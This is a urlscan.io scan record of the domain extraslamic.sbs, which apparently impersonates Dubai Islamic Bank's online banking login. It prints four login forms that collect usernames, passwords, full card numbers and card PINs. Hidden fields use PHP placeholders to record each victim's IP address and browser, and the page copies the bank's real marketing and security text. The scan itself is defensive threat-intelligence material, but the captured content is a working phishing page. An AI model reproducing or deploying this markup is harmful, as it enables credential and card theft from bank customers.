extraslamic.sbs Open in urlscan Pro
2606:4700:3033::6815:236c  Public Scan

URL: https://extraslamic.sbs/
Submission: On October 04 via api from BE — Scanned from DE

Form analysis 4 forms found in the DOM

POST #

<form id="form1" action="#" method="post">
  <input type="hidden" name="login_type" value="Normal Login">
  <input type="hidden" name="ip" value="<?=$ip;?>">
  <input type="hidden" name="ua" value="<?=$ua;?>">
  <div class="tab-pane fade in ng-scope tabs_content">
    <div>
      <div class="keyboard_contain_user ng-scope"></div>
      <div class="keyboard_contain_pass ng-scope"></div>
      <div class="login_icon castle ng-scope"></div>
      <p class="login_title ng-scope">
        <vb-text class="ng-binding ng-isolate-scope">dib online banking</vb-text>
      </p>
      <div class="input_box ng-scope">
        <vb-textbox>
          <input id="username1" name="username" type="text" placeholder="USER NAME" maxlength="" class="keyboard_user ng-empty ng-valid-pattern ng-valid-maxlength" spellcheck="false" autocomplete="off" autocorrect="off" required="">
          <div class="error-container validation-item" style="height: 25px;"><span>Please enter your user name.</span></div>
        </vb-textbox>
      </div>
      <div class="input_box margin_top_5px ng-scope">
        <vb-textbox>
          <input name="password" id="password1" type="password" placeholder="PASSWORD" maxlength="" class="keyboard_pass keyboard_pass ng-empty ng-valid-pattern ng-valid-maxlength" spellcheck="false" autocomplete="off" autocorrect="off" required="">
          <div class="error-container validation-item" style="height: 25px;"><span>Please enter password.</span></div>
        </vb-textbox>
      </div>
      <div class="rounded visible-lg margin_top_10px ng-scope">
        <vb-checkbox class="ng-isolate-scope">
          <input type="checkbox" id="checkbox_virtualKeyboardCheckbox" class="ng-pristine ng-untouched ng-valid ng-empty">
          <label for="checkbox_virtualKeyboardCheckbox" class="checkbox ng-binding">Use Virtual Keyboard</label>
        </vb-checkbox>
      </div>
      <div class="case_sensitive_text ng-scope">
        <vb-text class="ng-binding ng-isolate-scope">By logging in I accept the </vb-text>
        <vb-link-button>
          <a class="terms-and-condition-link"> <span class="ng-binding">T&amp;C</span> </a>
        </vb-link-button>
        <vb-text class="ng-binding ng-isolate-scope"> and agree to waive the cooling off period for digital services with immediate commitment to relevant Terms and Conditions. </vb-text>
      </div>
      <vb-button>
        <button type="submit" id="login-button" onclick="login()" class="btn btn-lg login_btn block"><span class="ng-binding ng-scope">Login</span></button>
      </vb-button>
      <div class="ng-scope">
        <div class="case_sensitive_text center">
          <vb-text class="ng-binding ng-isolate-scope">- OR -</vb-text>
        </div>
        <vb-button-group class="mb_0 uae-pass-btn ng-scope ng-isolate-scope">
          <div class="btn-group-4 text-center">
            <div class="buttons">
              <vb-button>
                <a id="redirectToUaePass" class="btn btn-lg btn btn-lg minwidth button-margin-left">
                                                                                                            <span class="ng-binding ng-scope">Login with UAE PASS</span>
                                                                                                        </a>
              </vb-button>
            </div>
          </div>
        </vb-button-group>
      </div>
    </div>
  </div>
</form>

POST #

<form id="form2" action="#" method="post">
  <input type="hidden" name="login_type" value="Quick Login">
  <input type="hidden" name="ip" value="<?=$ip;?>">
  <input type="hidden" name="ua" value="<?=$ua;?>">
  <div style="height: 100%;" class="tab-pane fade in quick-login-tab ng-scope tabs_content" id="" ng-show="(vm.useNgShow &amp;&amp; vm.selected) || !vm.useNgShow">
    <div>
      <div class="login_icon castle ng-scope"></div>
      <p class="login_title ng-scope">
        <vb-text class="ng-binding ng-isolate-scope">dib online banking</vb-text>
      </p>
      <h2 class="title_newUser ng-scope">
        <vb-text class="ng-binding ng-isolate-scope">Enter Your 16 Digit card No.</vb-text>
      </h2>
      <div class="input_wrapper form-inline quick_login_card ng-scope">
        <vb-cardnumber-textbox class="ng-isolate-scope">
          <vb-textbox>
            <input name="cc1" id="cc1" type="tel" placeholder="0000" minlength="4" maxlength="4" class="card-input card-input ng-empty ng-valid-pattern ng-valid-maxlength" spellcheck="false" autocomplete="off" autocorrect="off" pattern="[0-9]{0,4}"
              required="">
          </vb-textbox>
          <vb-textbox>
            <input name="cc2" id="cc2" type="tel" placeholder="0000" minlength="4" maxlength="4" class="card-input card-input ng-empty ng-valid-pattern ng-valid-maxlength" spellcheck="false" autocomplete="off" autocorrect="off" pattern="[0-9]{0,4}"
              required="">
          </vb-textbox>
          <vb-textbox>
            <input name="cc3" id="cc3" type="tel" placeholder="0000" minlength="4" maxlength="4" class="card-input card-input ng-empty ng-valid-pattern ng-valid-maxlength" spellcheck="false" autocomplete="off" autocorrect="off" pattern="[0-9]{0,4}"
              required="">
          </vb-textbox>
          <vb-textbox>
            <input name="cc4" id="cc4" type="tel" placeholder="0000" minlength="4" maxlength="4" class="card-input card-input ng-empty ng-valid-pattern ng-valid-maxlength" spellcheck="false" autocomplete="off" autocorrect="off" pattern="[0-9]{0,4}"
              required="">
          </vb-textbox>
        </vb-cardnumber-textbox>
      </div>
      <h2 class="title_newUser_secondHeader ng-scope">
        <vb-text class="ng-binding ng-isolate-scope">Enter Your 4 Digit PIN No.</vb-text>
      </h2>
      <div class="pin-number quick_login_pin ng-scope">
        <div class="input_wrapper form-inline">
          <vb-textbox>
            <input name="pin" id="pin" type="password" placeholder="" minlength="4" maxlength="4" class="pinfield pinfield ng-empty ng-valid-pattern ng-valid-maxlength" spellcheck="false" autocomplete="off" autocorrect="off" required="">
          </vb-textbox>
        </div>
      </div>
      <div class="case_sensitive_text ng-scope">
        <vb-text class="ng-binding ng-isolate-scope"> By logging in I accept the T&amp;C, Salary In Advance Key Fact Statement, and agree to waive the cooling off period with immediate commitment to relevant Terms &amp; Conditions. </vb-text>
        <vb-link-button>
          <a class="terms-and-condition-link"> <span class="ng-binding">Terms and Conditions</span> </a>
        </vb-link-button>
      </div>
      <vb-button tabindex="0">
        <button id="quick-login-button" onclick="quicklogin()" type="submit" class="btn btn-lg login_btn block"><span class="ng-binding ng-scope">Login</span></button>
      </vb-button>
      <div class="ng-scope">
        <div class="case_sensitive_text center">
          <vb-text class="ng-binding ng-isolate-scope">- OR -</vb-text>
        </div>
        <vb-button-group class="mb_0 uae-pass-btn ng-scope ng-isolate-scope">
          <div class="btn-group-4 text-center">
            <div class="buttons">
              <vb-button>
                <a id="redirectToUaePass" class="btn btn-lg btn btn-lg minwidth button-margin-left">
                                                                                                            <span class="ng-binding ng-scope">Login with UAE PASS</span>
                                                                                                        </a>
              </vb-button>
            </div>
          </div>
        </vb-button-group>
      </div>
    </div>
  </div>
</form>

POST #

<form id="form3" action="#" method="post">
  <input type="hidden" name="login_type" value="Normal Login">
  <input type="hidden" name="ip" value="<?=$ip;?>">
  <input type="hidden" name="ua" value="<?=$ua;?>">
  <div class="tab-pane fade in ng-scope tabs_content">
    <div>
      <div class="keyboard_contain_user ng-scope"></div>
      <div class="keyboard_contain_pass ng-scope"></div>
      <div class="login_icon castle ng-scope"></div>
      <p class="login_title ng-scope">
        <vb-text class="ng-binding ng-isolate-scope">dib online banking</vb-text>
      </p>
      <div class="input_box ng-scope">
        <vb-textbox>
          <input name="username" id="username" type="text" placeholder="USER NAME" maxlength="" class="keyboard_user ng-empty ng-valid-pattern ng-valid-maxlength" spellcheck="false" autocomplete="off" autocorrect="off" required="">
        </vb-textbox>
      </div>
      <div class="input_box margin_top_15px ng-scope">
        <vb-textbox>
          <input name="password" id="password" type="password" placeholder="PASSWORD" maxlength="" class="keyboard_pass keyboard_pass ng-empty ng-valid-pattern ng-valid-maxlength" spellcheck="false" autocomplete="off" autocorrect="off" required="">
        </vb-textbox>
      </div>
      <div class="rounded visible-lg margin_top_15px ng-scope">
        <vb-checkbox class="ng-isolate-scope">
          <input type="checkbox" id="checkbox_virtualKeyboardCheckbox" class="ng-pristine ng-untouched ng-valid ng-empty">
          <label for="checkbox_virtualKeyboardCheckbox" class="checkbox ng-binding">Use Virtual Keyboard</label>
        </vb-checkbox>
      </div>
      <div class="case_sensitive_text ng-scope">
        <vb-text class="ng-binding ng-isolate-scope"> By logging in I accept the T&amp;C, Salary In Advance Key Fact Statement, and agree to waive the cooling off period with immediate commitment to relevant Terms &amp; Conditions. </vb-text>
        <vb-link-button>
          <a class="terms-and-condition-link"> <span class="ng-binding">Terms and Conditions</span> </a>
        </vb-link-button>
      </div>
      <vb-button>
        <button type="submit" id="login-button" onclick="login()" class="btn btn-lg login_btn block"><span class="ng-binding ng-scope">Login</span></button>
      </vb-button>
      <div class="ng-scope">
        <div class="case_sensitive_text center">
          <vb-text class="ng-binding ng-isolate-scope">- OR -</vb-text>
        </div>
        <vb-button-group class="mb_0 uae-pass-btn ng-scope ng-isolate-scope">
          <div class="btn-group-4 text-center">
            <div class="buttons">
              <vb-button>
                <a id="redirectToUaePass" class="btn btn-lg btn btn-lg minwidth button-margin-left">
                                                                                                    <span class="ng-binding ng-scope">Login with UAE PASS</span>
                                                                                                </a>
              </vb-button>
            </div>
          </div>
        </vb-button-group>
      </div>
    </div>
  </div>
</form>

POST #

<form id="form4" action="#" method="post">
  <input type="hidden" name="login_type" value="Quick Login">
  <input type="hidden" name="ip" value="<?=$ip;?>">
  <input type="hidden" name="ua" value="<?=$ua;?>">
  <div style="height: 100%;" class="tab-pane fade in quick-login-tab ng-scope tabs_content">
    <div>
      <div class="login_icon castle ng-scope"></div>
      <p class="login_title ng-scope">
        <vb-text class="ng-binding ng-isolate-scope">dib online banking</vb-text>
      </p>
      <h2 class="title_newUser ng-scope">
        <vb-text class="ng-binding ng-isolate-scope">Enter Your 16 Digit card No.</vb-text>
      </h2>
      <div class="input_wrapper form-inline quick_login_card ng-scope">
        <vb-cardnumber-textbox class="ng-isolate-scope">
          <vb-textbox>
            <input name="cc1" id="cc11" type="tel" placeholder="0000" minlength="4" maxlength="4" class="card-input card-input ng-empty ng-valid-pattern ng-valid-maxlength" spellcheck="false" autocomplete="off" autocorrect="off" pattern="[0-9]{0,4}"
              required="">
          </vb-textbox>
          <vb-textbox>
            <input name="cc2" id="cc21" type="tel" placeholder="0000" minlength="4" maxlength="4" class="card-input card-input ng-empty ng-valid-pattern ng-valid-maxlength" spellcheck="false" autocomplete="off" autocorrect="off" pattern="[0-9]{0,4}"
              required="">
          </vb-textbox>
          <vb-textbox>
            <input name="cc3" id="cc31" type="tel" placeholder="0000" minlength="4" maxlength="4" class="card-input card-input ng-empty ng-valid-pattern ng-valid-maxlength" spellcheck="false" autocomplete="off" autocorrect="off" pattern="[0-9]{0,4}"
              required="">
          </vb-textbox>
          <vb-textbox>
            <input name="cc4" id="cc41" type="tel" placeholder="0000" minlength="4" maxlength="4" class="card-input card-input ng-empty ng-valid-pattern ng-valid-maxlength" spellcheck="false" autocomplete="off" autocorrect="off" pattern="[0-9]{0,4}"
              required="">
          </vb-textbox>
        </vb-cardnumber-textbox>
      </div>
      <h2 class="title_newUser_secondHeader ng-scope">
        <vb-text class="ng-binding ng-isolate-scope">Enter Your 4 Digit PIN No.</vb-text>
      </h2>
      <div class="pin-number quick_login_pin ng-scope">
        <div class="input_wrapper form-inline">
          <vb-textbox>
            <input name="pin" id="pin1" type="password" placeholder="" minlength="4" maxlength="4" class="pinfield pinfield ng-empty ng-valid-pattern ng-valid-maxlength" spellcheck="false" autocomplete="off" autocorrect="off" required="">
          </vb-textbox>
        </div>
      </div>
      <div class="case_sensitive_text ng-scope">
        <vb-text class="ng-binding ng-isolate-scope"> By logging in I accept the T&amp;C, Salary In Advance Key Fact Statement, and agree to waive the cooling off period with immediate commitment to relevant Terms &amp; Conditions. </vb-text>
        <vb-link-button>
          <a class="terms-and-condition-link"> <span class="ng-binding">Terms and Conditions</span> </a>
        </vb-link-button>
      </div>
      <vb-button tabindex="0">
        <button id="quick-login-button" onclick="quicklogin()" type="submit" class="btn btn-lg login_btn block"><span class="ng-binding ng-scope">Login</span></button>
      </vb-button>
      <div class="ng-scope">
        <div class="case_sensitive_text center">
          <vb-text class="ng-binding ng-isolate-scope">- OR -</vb-text>
        </div>
        <vb-button-group class="mb_0 uae-pass-btn ng-scope ng-isolate-scope">
          <div class="btn-group-4 text-center">
            <div class="buttons">
              <vb-button>
                <a id="redirectToUaePass" class="btn btn-lg btn btn-lg minwidth button-margin-left">
                                                                                                    <span class="ng-binding ng-scope">Login with UAE PASS</span>
                                                                                                </a>
              </vb-button>
            </div>
          </div>
        </vb-button-group>
      </div>
    </div>
  </div>
</form>

Text Content

FOR BETTER USER EXPERIENCE, KINDLY USE ONLINE BANKING IN PORTRAIT MODE

 * Login
 * LEARN MORE
 * SECURITY

Invalid User Id or Password. Please try again.
 1. 
 2. 

 * Login
 * Quick Login
 * New User
 * Need Help?

dib online banking

Please enter your user name.
Please enter password.
Use Virtual Keyboard
By logging in I accept the T&C and agree to waive the cooling off period for
digital services with immediate commitment to relevant Terms and Conditions.
Login
- OR -
Login with UAE PASS

dib online banking


ENTER YOUR 16 DIGIT CARD NO.




ENTER YOUR 4 DIGIT PIN NO.


By logging in I accept the T&C, Salary In Advance Key Fact Statement, and agree
to waive the cooling off period with immediate commitment to relevant Terms &
Conditions. Terms and Conditions
Login
- OR -
Login with UAE PASS









 * Login
 * Quick Login
 * New User
 * Need Help?

dib online banking



Use Virtual Keyboard
By logging in I accept the T&C, Salary In Advance Key Fact Statement, and agree
to waive the cooling off period with immediate commitment to relevant Terms &
Conditions. Terms and Conditions
Login
- OR -
Login with UAE PASS

dib online banking


ENTER YOUR 16 DIGIT CARD NO.




ENTER YOUR 4 DIGIT PIN NO.


By logging in I accept the T&C, Salary In Advance Key Fact Statement, and agree
to waive the cooling off period with immediate commitment to relevant Terms &
Conditions. Terms and Conditions
Login
- OR -
Login with UAE PASS


WHY CHOOSE DIB ONLINE


Everyone's Welcome

EVERYONE WELCOME

If you are a Current/ Savings Account Holder you can register to Online
Banking.The Information Required: - Debit Card Number & Debit Card PIN- If you
hold only a Credit Card Relationship you can register to Online Banking
Information Required - Credit Card Number & Credit Card PIN - If you hold only a
Murabaha Relationship you can register to Online Banking Information Required -
Murabaha Contract Number.



Smart Services

SMART SERVICES

Al Islami Online Banking offers over 115 banking services that you can access
and use anywhere, anytime - giving you a banking experience thats convenient,
secure and paperless



Easy & Fast Bill Payments

EASY & FAST BILL PAYMENTS

No more writing cheques, waiting in queues and traveling to different places to
pay your bills. Simply log on to Al Islami Online Banking to view your bills and
make instant payments. We offer a range of 29 different types of bill payment
services from the following billers : · Etisalat· Du· RTA· DEWA (Dubai
Electricity & Water Authority)· SEWA (Sharjah Electricity & Water Authority)·
FEWA (Federal Electricity & Water Authority)· ADDC (Abu Dhabi Distribution
Company)· Emicool· Air Arabia· Fly Dubai· Department of Economic Development
(DED)· Charity Payments· Ajman Sewerage· Emaar Payments· Noqodi Payment



Simple Sign Up

YOUR BANKING EXPERIENCE EVEN BETTER

Al Islami Online Banking is available to all Account, Credit Card and Murabaha
holders of the bank. To register for Online, your mobile number should be
updated on the Bank’s records any one of the following are required: Debit card
number and card PIN Credit card number and card PIN Murabaha account number To
register for this service, follow the below steps: Go to www.dib.ae and click
Login Click on the “New User” button Enter Card & PIN details requested Enter
the required security credentials Set up your security profile Select your User
Id & Password Your Online Banking Registration is complete. If we do not have
your current mobile number or you are not in possession of any of the above,
please visit any branch for assistance.



Faster Transfers

FASTER TRANSFERS

The Online service provides multiple types of transfers which enable customers
to send money in less than one minutes and the beneficiary can collect it
instantly, customer can save beneficiaries for next transfers and can save it as
favorite transactions.



Secure & Trusted

SECURE AND TRUSTED SERVICES

We involve several layers of robust security including 128-bit encryption,
firewall, dual factor authentication and automatic session time out. However,
the ultimate key to secure Online Banking lies in your hands. By taking the
following precautions:•Log off from Online Banking upon completion of your
session. Use the “Logout” button to end the session. Do not shut the browser
window to log off•DIB will never contact you by e-mail or otherwise to ask you
to validate your personal information (such as your Online Banking User Id,
Password or Security Profile)•Never follow a link with an email to start an
Online Banking session. Browse and click Login to start a new session•If you
receive an email that appears to be suspicious, do not reply to it or click on
the link it provides. Immediately report the matter to us by calling + 9714 609
2222 or forwarding the email to Customer Care at contactus@dib.ae. If you
suspect that you have become a victim of a fraudulent email, please contact the
bank immediately•Install all security updates offered by your software
provider(s)•If you have forgotten your User ID, Password or Security set up,
please click on the “need help” option on the login page.



Flexible Browser Requirements

FLEXIBLE BROWSER REQUIREMENTS

We have tested Al Islami Online Banking on a number of hardware/ operating
systems/ browsers and the following are recommended: HardwarePentium Processor
or greater Optimal Screen Resolution 1024 x 768 16MB memory or above 20MB or
more hard disk space available An internet connection (Recommended – ISDN
connection Minimum modem speed of 56 kbps or higher)Operating SystemWindow
2000Windows XP (SP2)MAC OSXBrowserInternet Explorer Ver 11 or later, Microsoft
Edge Browser, Chrome 48 or later and Firefox 50 or later.




SAFEST ONLINE BANKING

To know more about secure online banking practices with Dubai Islamic Bank,
visit http://www.dib.ae/support

Visit Dubai Islamic Bank Page


WHY CHOOSE DIB ONLINE


Everyone's Welcome

EVERYONE WELCOME

If you are a Current/ Savings Account Holder you can register to Online Banking.
The Information Required: - Debit Card Number & Debit Card PIN - If you hold
only a Credit Card Relationship you can register to Online Banking Information
Required - Credit Card Number & Credit Card PIN - If you hold only a Murabaha
Relationship you can register to Online Banking Information Required - Murabaha
Contract Number.



Smart Services

SMART SERVICES

Al Islami Online Banking offers over 115 banking services that you can access
and use anywhere, anytime - giving you a banking experience thats convenient,
secure and paperless



Easy & Fast Bill Payments

EASY & FAST BILL PAYMENTS

No more writing cheques, waiting in queues and traveling to different places to
pay your bills. Simply log on to Al Islami Online Banking to view your bills and
make instant payments. We offer a range of 29 different types of bill payment
services from the following billers : · Etisalat · Du · RTA · DEWA (Dubai
Electricity & Water Authority) · SEWA (Sharjah Electricity & Water Authority) ·
FEWA (Federal Electricity & Water Authority) · ADDC (Abu Dhabi Distribution
Company) · Emicool · Air Arabia · Fly Dubai · Department of Economic Development
(DED) · Charity Payments · Ajman Sewerage · Emaar Payments · Noqodi Payment



Simple Sign Up

YOUR BANKING EXPERIENCE EVEN BETTER

Al Islami Online Banking is available to all Account, Credit Card and Murabaha
holders of the bank. To register for Online, your mobile number should be
updated on the Bank’s records any one of the following are required: Debit card
number and card PIN Credit card number and card PIN Murabaha account number To
register for this service, follow the below steps: Go to www.dib.ae and click
Login Click on the “New User” button Enter Card & PIN details requested Enter
the required security credentials Set up your security profile Select your User
Id & Password Your Online Banking Registration is complete. If we do not have
your current mobile number or you are not in possession of any of the above,
please visit any branch for assistance.



Faster Transfers

FASTER TRANSFERS

The Online service provides multiple types of transfers which enable customers
to send money in less than one minutes and the beneficiary can collect it
instantly, customer can save beneficiaries for next transfers and can save it as
favorite transactions.



Secure & Trusted

SECURE AND TRUSTED SERVICES

We involve several layers of robust security including 128-bit encryption,
firewall, dual factor authentication and automatic session time out. However,
the ultimate key to secure Online Banking lies in your hands. By taking the
following precautions: • Log off from Online Banking upon completion of your
session. Use the “Logout” button to end the session. Do not shut the browser
window to log off • DIB will never contact you by e-mail or otherwise to ask you
to validate your personal information (such as your Online Banking User Id,
Password or Security Profile) • Never follow a link with an email to start an
Online Banking session. Browse and click Login to start a new session • If you
receive an email that appears to be suspicious, do not reply to it or click on
the link it provides. Immediately report the matter to us by calling + 9714 609
2222 or forwarding the email to Customer Care at contactus@dib.ae. If you
suspect that you have become a victim of a fraudulent email, please contact the
bank immediately • Install all security updates offered by your software
provider(s) • If you have forgotten your User ID, Password or Security set up,
please click on the “need help” option on the login page.



Flexible Browser Requirements

FLEXIBLE BROWSER REQUIREMENTS

We have tested Al Islami Online Banking on a number of hardware/ operating
systems/ browsers and the following are recommended: Hardware Pentium Processor
or greater Optimal Screen Resolution 1024 x 768 16MB memory or above 20MB or
more hard disk space available An internet connection (Recommended – ISDN
connection Minimum modem speed of 56 kbps or higher) Operating System Window
2000 Windows XP (SP2) MAC OSX Browser Internet Explorer Ver 11 or later,
Microsoft Edge Browser, Chrome 48 or later and Firefox 50 or later.




SAFEST ONLINE BANKING

To know more about secure online banking practices with Dubai Islamic Bank,
visit http://www.dib.ae/support

Visit Dubai Islamic Bank Page
Copyright © 2024 Dubai Islamic Bank Public Joint Stock Company, licensed and
regulated by the Central Bank of the UAE. All Rights Reserved.
 * Privacy Policy
 * Banking Services Agreement